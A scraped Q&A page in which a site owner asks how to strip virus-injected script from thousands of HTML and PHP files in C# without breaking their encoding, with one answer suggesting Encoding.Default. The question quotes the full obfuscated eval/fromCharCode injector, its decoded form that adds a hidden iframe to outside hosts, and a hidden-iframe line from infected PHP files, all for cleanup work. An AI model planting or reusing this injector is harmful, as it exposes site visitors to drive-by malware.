Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Can a file be read and written right back with small changes without knowing its encoding in C#?

I need to download over 5000 .html and .php files from FTP. I need to read each file, remove some content that was injected by a virus, and save the file back to FTP.

I'm using the following code:

// Read the whole file into memory as text. The reader is asked to decode as UTF-8;
// the third argument (true) tells it to look for a byte order mark at the start
// of the file.
// NOTE(review): bytes that are not valid UTF-8 (e.g. Windows-1250 text without a BOM)
// presumably do not survive this decode unchanged - confirm before running on real files.
string content;
using (StreamReader sr = new StreamReader(fileName, System.Text.Encoding.UTF8, true)) {
    content = sr.ReadToEnd();
    sr.Close(); // redundant: leaving the using block already disposes the reader
}

// Write the text to a second file named fileName + "1" + file.Extension,
// overwriting any existing file (append = false) and encoding the output as UTF-8.
using (StreamWriter sw = new StreamWriter(fileName + "1" + file.Extension, false, System.Text.Encoding.UTF8))
{
    sw.WriteLine(content); // WriteLine adds a line terminator after the content
    sw.Close(); // redundant: leaving the using block already disposes the writer
}

I downloaded some files by hand, and some have <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" /> but I don't want to assume all of them are like that. I checked with Notepad++ and some text files are ANSI. The PHP files seem to be UTF-8 and the HTML files Windows-1250, but I would prefer to be sure I don't break the files while trying to fix them. So is there a way to remove the virus links from the web pages without having to know or guess the encoding?

Edit. I'm trying to find and remove something like this:

var s=new String();try{document.rvwrew.vewr}catch(q){r=1;c=String;}if(r&&document.createTextNode)u=2;e=eval;m=[4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,64/u,59.5*u,210/u,50*u,232/u,52*u,122/u,19.5*u,98/u,24*u,78/u,16*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,122/u,19.5*u,98/u,24*u,78/u,16*u,230/u,58*u,242/u,54*u,202/u,30.5*u,78/u, 
59*u,210/u,57.5*u,210/u,49*u,210/u,54*u,210/u,58*u,242/u,29*u,208/u,52.5*u,200/u,50*u,202/u,55*u,118/u,56*u,222/u,57.5*u,210/u,58*u,210/u,55.5*u,220/u,29*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,118/u,54*u,202/u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5*u,78/u,31*u,120/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,124/u,17*u,82/u,29.5*u,18/u,4.5*u,250/u,4.5*u,18/u,51*u,234/u,55*u,198/u,58*u,210/u,55.5*u,220/u,16*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,61.5*u,18/u,4.5*u,18/u,59*u,194/u,57*u,64/u,51*u,64/u,30.5*u,64/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,198/u,57*u,202/u,48.5*u,232/u,50.5*u,138/u,54*u,202/u,54.5*u,202/u,55*u,232/u,20*u,78/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,230/u,57*u,198/u,19.5*u,88/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,82/u,29.5*u,204/u, 
23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u];if(document.createTextNode)with(c)mm=fromCharCode;for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{doc.qwe.removeChild()}catch(q){e(s);}

which after decoding is

// Decoded payload: if the page already has a <body> element, inject the iframe;
// otherwise just write an empty string to the document.
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
// Builds an <iframe> pointing at the remote URL, makes it invisible
// (visibility hidden, absolutely positioned at 0,0, sized 10x10) and
// appends it to the first <body> element of the page.
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://fiberastat.com/temp/stat.php');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

And when you visit the web page, it shows you this (after decoding):

// Decoded payload: if the page already has a <body> element, inject the iframe;
// otherwise just write an empty string to the document.
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
// Builds an <iframe> pointing at the remote URL, makes it invisible
// (visibility hidden, absolutely positioned at 0,0, sized 10x10) and
// appends it to the first <body> element of the page.
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://vtempe.in/in.cgi?17');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

The script is added as the last 3 lines of the file and basically starts right after the closing tag, i.e. </html>var

The PHP files have more or less this kind of line: <iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe> but it can be anywhere in the file.

I'm not sure if there's any other way than to rewrite those files. But having to go through 5000 files by hand seems a bit too much and too risky :-)

like image 317
MadBoy Avatar asked Feb 09 '12 21:02

MadBoy


1 Answer

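Assuming that none of the files are UTF-16 or UTF-32, and that the parts that you want to interact with are entirely 7-bit ASCII, you can open and save them using Encoding.Default, which will round-trip any higher character correctly. (This relies on Encoding.Default being a single-byte ANSI code page, as it is on .NET Framework on a typical Western or Central European Windows system; on .NET Core and later, Encoding.Default is UTF-8, which does not round-trip arbitrary bytes.)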

like image 192
SLaks Avatar answered Oct 12 '22 07:10

SLaks